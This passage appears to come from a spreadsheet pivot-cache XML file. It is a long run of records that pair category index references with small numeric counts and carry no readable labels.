  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="305"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="305"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="305"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="305"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="305"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="306"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="306"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="307"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="30"/>
    <x v="307"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="307"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="307"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="23"/>
    <x v="308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="308"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="11"/>
    <x v="308"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="308"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="308"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="309"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="309"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="309"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="309"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="309"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="310"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="310"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="310"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="312"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="312"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="312"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="312"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="313"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="313"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="313"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="22"/>
    <x v="314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="314"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="314"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="315"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="23"/>
    <x v="316"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="316"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="130"/>
    <x v="316"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="13"/>
    <x v="317"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="317"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="318"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="318"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="318"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="318"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="318"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="319"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="319"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="319"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="319"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="320"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="320"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="320"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="321"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="321"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="321"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="321"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="37"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="27"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="42"/>
    <x v="283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="12"/>
    <x v="283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="80"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="322"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="322"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="322"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="322"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="322"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="323"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="323"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="324"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="324"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="324"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="350"/>
    <x v="324"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="325"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="325"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="325"/>
  </r>
